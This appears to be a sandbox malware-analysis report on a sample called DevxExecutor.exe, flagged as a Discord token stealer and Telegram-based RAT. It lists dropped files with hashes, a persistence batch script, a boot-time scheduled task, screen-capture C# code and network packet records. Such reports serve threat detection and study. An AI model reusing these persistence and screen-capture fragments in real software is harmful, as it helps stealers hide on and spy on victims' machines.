                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y0mkqvli.w5s.ps1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\cstealer.exe

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\Desktop\DevxExecutor.exe
                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8870956
                                                                                                                                                          Entropy (8bit):7.992978188997873
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:196608:4hrUv8ZVqu0dQmR8dA6ly8Qnf2ODjMnGydShTl5nxX6rbOiWo33kHTy:NqVqldQJl6F3MnG3xl5nB6rbfZkHTy
                                                                                                                                                          MD5:BC2B7DE582FB94F0C44855D8FAB8C236
                                                                                                                                                          SHA1:62E1CFD2D999025930A3DACF6BF71B8F9D166C2B
                                                                                                                                                          SHA-256:2481CAEAA2B5DB3C040AAB3054FCD0BFD42637A4000C4B676215459D38CA4C3C
                                                                                                                                                          SHA-512:5CFA22EAC5EEC79C4F479A3BC54ED31F0A1943AC598954AD05B2F3E6D63EC7ABDF496F8926446C08D44685DDCB338018A14FE9D5167DCC16B752D49B661704E9
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............................-..............,..........................................Rich............................PE..d.....;f.........."....&.....b......@..........@.........................................`.....................................................x....p.......0...#...........p..X...`............................... ...@...............8............................text............................... ..`.rdata..6/.......0..................@..@.data....3..........................@....pdata...#...0...$..................@..@_RDATA.......`......................@..@.rsrc........p......................@..@.reloc..X....p......................@..B........................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\main.exe

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\Desktop\DevxExecutor.exe
                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):37726222
                                                                                                                                                          Entropy (8bit):7.999663407452581
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:786432:HD6fTv5s1lTgSVo4OI43VRETlUwmEO4j3txUfWcz/pW/:HD2TQlcmOH38TlSktEm
                                                                                                                                                          MD5:1EE0837EEDF03E82AA652B1BF157387F
                                                                                                                                                          SHA1:9F67248352C6EB3FF5C6C4D5EB05A55EFF499CD8
                                                                                                                                                          SHA-256:545F339C71CAC4B4EB0440FED022A51032C208EE1D5CDEF050D97B37ADF8DE4A
                                                                                                                                                          SHA-512:8BD47BD3EF1F622029CB6ECEC02EAC62C45F6D788D813ECA80C275A4FB4CC35A1C25F869B66551FE57099500587CEBC135CBCDA0E7A43E70FCEB3762185B0C5A
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............................-..............,..........................................Rich............................PE..d.../.;f.........."....&.....|......@..........@....................................%.@...`.....................................................x....p.......0...#..............X...`............................... ...@...............8............................text............................... ..`.rdata..6/.......0..................@..@.data....3..........................@....pdata...#...0...$..................@..@_RDATA.......`......................@..@.rsrc........p......................@..@.reloc..X............(..............@..B........................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\tmp7F1E.tmp.bat

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\main.exe
                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):258
                                                                                                                                                          Entropy (8bit):5.051644977651872
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:QkEgH5anIBdGKoQRw+HG9U9aZ5MHPKw+Hs8E19aZ5MH6tuovn:QYH5ROKjm9pHMvk1EmHMO
                                                                                                                                                          MD5:12328811B412538D8EBEC5F70DDFCB72
                                                                                                                                                          SHA1:7ED4D17428C6ACF4F74214AD16FDCA33A79E2139
                                                                                                                                                          SHA-256:1832167FA9D0E1B8B74D4696296F235F33760883DCC5B72954A8511EB0873136
                                                                                                                                                          SHA-512:F7D98858A556EEE811CE731D83F06C4D86CE10C6FC3C7ACC763EBE4AAB3E8BB1C094663994A56D88D1DB5B3F67E53311BC70BCBC58E91D2924580B56FB9B9F92
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview::l..Tasklist /fi "PID eq 7796" | find ":"..if Errorlevel 1 (.. Timeout /T 1 /Nobreak.. Goto l..)..Cd "C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog"..Timeout /T 1 /Nobreak..Start "" "C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"..

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmp

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\setup.exe
                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):161792
                                                                                                                                                          Entropy (8bit):5.8318794599287465
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:lQbW78Kb89UMmY8MA1cRWr7BiKcOO1Sf7lHn4mr3yo4f8P2:lQK75bobwfBiKCYfhHLU5
                                                                                                                                                          MD5:1667C96053EAA078109F8B0C9500FC9D
                                                                                                                                                          SHA1:E0F567763BAAAA757F66F96951D9810F45F69F30
                                                                                                                                                          SHA-256:F7E1E53A6FB24A2BD9206305C59448A8F99B6F5847A6ACB18EB0FD9F7383FFB4
                                                                                                                                                          SHA-512:6285ADE5CB85B71814EDD57EDDC512A031596043B7FCE4FCC909A0B78ECFE161C062AD0637EC82CBDAA36675AD32FBD0C94DDD96BB575BE8B1FBB47DF706AAE1
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@.......................................sr......!..L.!This program cannot be run in DOS mode....$.......K...............D.......D...........o...9A......9A9.....9A......Rich............PE..d....t.d.........."....%.....X......X".........@..........................................`..................................................8.......p..`>...`..8....................5..8............................................0...............................text............................... ..`.rdata.......0......."..............@..@.data........P......................@....pdata..8....`.......6..............@..@.rsrc...`>...p...@...8..............@..@........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\yntnomxcupkb.xml

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\setup.exe
                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1490
                                                                                                                                                          Entropy (8bit):5.1015990235428035
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:2dk4+SkIMFWYL60YeGlMhEMjn5pwjpILUYODOLqx49RJh7h8gJ15E15LNEB86tn:cC3IQDL60uydbQ9IIYODOLqOdq2sbEx
                                                                                                                                                          MD5:546D67A48FF2BF7682CEA9FAC07B942E
                                                                                                                                                          SHA1:A2CB3A9A97FD935B5E62D4C29B3E2C5AB7D5FC90
                                                                                                                                                          SHA-256:EFF7EDC19E6C430AAECA7EA8A77251C74D1E9ABB79B183A9EE1F58C2934B4B6A
                                                                                                                                                          SHA-512:10D90EDF31C0955BCEC52219D854952FD38768BD97E8E50D32A1237BCCAF1A5EB9F824DA0F81A7812E0CE62C0464168DD0201D1C0EB61B9FE253FE7C89DE05FE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <Triggers>.. <BootTrigger>.. . <Enabled>true</Enabled>.. </BootTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">... <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <Duration>PT10M</Duration>.. <WaitTimeout>PT1H</WaitTimeout>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabl

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\zcrbnhje\zcrbnhje.0.cs

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1004
                                                                                                                                                          Entropy (8bit):4.154581034278981
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                          MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                          SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                          SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                          SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\zcrbnhje\zcrbnhje.cmdline

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (606), with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):609
                                                                                                                                                          Entropy (8bit):5.349852899577312
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6KOkuqy776SE71xBkuqTM3RDwA+iM3RLB5923fT:p37Lvkmb6KOkqe1xBkrk+ikqEWZE2xH
                                                                                                                                                          MD5:D3D567294682D009698EFCE54AC44C59
                                                                                                                                                          SHA1:279A6E9B70AAD25FEBFE7FB945DC4B3BA7BE4F34
                                                                                                                                                          SHA-256:2BC24183A5BA84A15BEF1A4F5320874146E5F5C12FF82F839A934D29C742580C
                                                                                                                                                          SHA-512:9717CFBE997261D49F2B939B5C93EF51DD2223BB7CE59109607377519828BAA2A647AD91C2B5092B8DF003C432D5854756FC3418DB7645C2A90307AE29DB0EDD
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\zcrbnhje\zcrbnhje.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\zcrbnhje\zcrbnhje.0.cs"

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\zcrbnhje\zcrbnhje.out

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (711), with CRLF, CR line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1151
                                                                                                                                                          Entropy (8bit):5.4995333953599035
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:KLeId3ka6KOkqeFkqlE2xOKax5DqBVKVrdFAMBJTH:2ekka6NkqeFkqlE2xOK2DcVKdBJj
                                                                                                                                                          MD5:045B77246CA541A2A0C820C83DE18B27
                                                                                                                                                          SHA1:8C990B77CEB68123B5347256B2C8FDA497EDA350
                                                                                                                                                          SHA-256:47CC7DC4E15E1BB8D0C3B26E6C033761D521F3624598EBB06B28797AB0F0CCE2
                                                                                                                                                          SHA-512:B567AB2AB47ED2A1A372AA557B01BA917A4686BBBF3D921147FA5288CEA6F2F986ECBD7303D2912FBE6CCD3FCCEC2A217657D95C3EFEE148913AB7BB41A04972
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\zcrbnhje\zcrbnhje.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\zcrbnhje\zcrbnhje.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no lon

                                                                                                                                                          C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\main.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5872344
                                                                                                                                                          Entropy (8bit):7.487098820179109
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:98304:nsl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6UcR65:nPOuK6mn9NzgMoYkSIvUcwti7TQlvciN
                                                                                                                                                          MD5:5DF3E2C717F267899F37EC6E8FC7F47A
                                                                                                                                                          SHA1:5E980079F67215BF69B8C1C16B56F40BF4A29958
                                                                                                                                                          SHA-256:E3F5C557ECE7EC27CB7E4A26482EADF0D9065065D94B2919F9B881BC74800E6E
                                                                                                                                                          SHA-512:8CEF1184120E010421D69FCF271822B3F0B45E34A1565152A3F2DECB8F500D0E69DE9816D9075683FCFB0F431713F3FBC42AC2D87503CDCDDE125ABA3FA1635D
                                                                                                                                                          Malicious:true
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_MillenuimRAT, Description: Yara detected Millenuim RAT, Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, Author: Joe Security
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0...Y...........Y.. ........@.. ........................Z...........`.................................l.Y.O.....Y.@.....................Y.......Y.8............................................ ............... ..H............text....Y.. ....Y................. ..`.rsrc...@.....Y.......Y.............@..@.reloc........Y.......Y.............@..B..................Y.....H.........X.. ...............W..........................................(....*..(....*..{....*"..}....*..*F.{....o....s....*...2...{....o..../..{.....o....*.s,...*...(....,.(........2...{....o....2..{.....o....*.{......o....*..s,...*v..(....,.(.......{.....o....*2.{....o....*...2...{....o....2..*.{.....o.....{.....o....*>.{.....o....&.*..0..k.......s......{.....{....o....o.....{....o.....+&..(.......(....,...o[...oW...+...oW.....(....-...........o......*.......(.3[......>..s

                                                                                                                                                          Static File Info

                                                                                                                                                          General

                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Entropy (8bit):7.999879548396559
                                                                                                                                                          TrID:
                                                                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                          File name:DevxExecutor.exe
                                                                                                                                                          File size:46'285'824 bytes
                                                                                                                                                          MD5:e4897ef7419e128b1f7473119ce0bd07
                                                                                                                                                          SHA1:5aad252412a5923438f30cb9c397731a9b020121
                                                                                                                                                          SHA256:6d5ba38a5e9bde7939ac5dcb8fdcb970701168064d30abcf518cf8d272a0f581
                                                                                                                                                          SHA512:db66ea2cb3f5f30934ab071e1dd2e7b41f6dc5c4be125f1d2d6aab627b3be8b6cf8fcbed517a414cdf037a068414b178176edba2e28de6419b65269e0abb162c
                                                                                                                                                          SSDEEP:786432:NCZkrrfdktmLX8t8lBBvUPlZIOPuOI64zlNWtVMoOIsuXzfVib4a9BWN:N4GlkcLMtUzilKUINzmtVkMfWo
                                                                                                                                                          TLSH:37A733429A917DE172450DF1C5C8C6AC62E2CED81B8D9720F11BCFDF4689FB4992BA4C
                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;f.................:...........Y... ...`....@.. ....................................@................................

                                                                                                                                                          File Icon

                                                                                                                                                          Icon Hash:00928e8e8686b000

                                                                                                                                                          Static PE Info

                                                                                                                                                          General

                                                                                                                                                          Entrypoint:0x30259ee
                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                          Digitally signed:false
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                          Time Stamp:0x663BDAF9 [Wed May 8 20:05:13 2024 UTC]
                                                                                                                                                          TLS Callbacks:
                                                                                                                                                          CLR (.Net) Version:v4.0.30319
                                                                                                                                                          OS Version Major:4
                                                                                                                                                          OS Version Minor:0
                                                                                                                                                          File Version Major:4
                                                                                                                                                          File Version Minor:0
                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                          Entrypoint Preview

                                                                                                                                                          Instruction
                                                                                                                                                          jmp dword ptr [00402000h]
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al

                                                                                                                                                          Data Directories

                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x2c259940x57.text
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c260000x4d8.rsrc
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x2c280000xc.reloc
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                          Sections

                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                          .text0x20000x2c239f40x2c23a00a0d9d82b4a150b1c332ce4b2032fb759unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                          .rsrc0x2c260000x4d80x600dc71992499429b89f0fa84bba5e2e402False0.375data3.7395959982028026IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                          .reloc0x2c280000xc0x200c295a8908b5f91495fbc3820a1c2a33cFalse0.044921875data0.12227588125913882IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                          Resources

                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                          RT_VERSION0x2c260a00x244data0.4706896551724138
                                                                                                                                                          RT_MANIFEST0x2c262e80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                                                                                                          Imports

                                                                                                                                                          DLLImport
                                                                                                                                                          mscoree.dll_CorExeMain

                                                                                                                                                          Network Behavior

                                                                                                                                                          Network Port Distribution

                                                                                                                                                          TCP Packets

                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          May 9, 2024 17:47:34.995094061 CEST4971680192.168.2.5208.95.112.1
                                                                                                                                                          May 9, 2024 17:47:35.147444963 CEST8049716208.95.112.1192.168.2.5
                                                                                                                                                          May 9, 2024 17:47:35.147620916 CEST4971680192.168.2.5208.95.112.1
                                                                                                                                                          May 9, 2024 17:47:35.148781061 CEST4971680192.168.2.5208.95.112.1
                                                                                                                                                          May 9, 2024 17:47:35.301635027 CEST8049716208.95.112.1192.168.2.5
                                                                                                                                                          May 9, 2024 17:47:35.369262934 CEST4971680192.168.2.5208.95.112.1
                                                                                                                                                          May 9, 2024 17:47:39.715002060 CEST49718443192.168.2.5185.199.108.133
                                                                                                                                                          May 9, 2024 17:47:39.715033054 CEST44349718185.199.108.133192.168.2.5
                                                                                                                                                          May 9, 2024 17:47:39.715090036 CEST49718443192.168.2.5185.199.108.133
                                                                                                                                                          May 9, 2024 17:47:39.733352900 CEST49718443192.168.2.5185.199.108.133
                                                                                                                                                          May 9, 2024 17:47:39.733372927 CEST44349718185.199.108.133192.168.2.5
                                                                                                                                                          May 9, 2024 17:47:40.048959970 CEST44349718185.199.108.133192.168.2.5
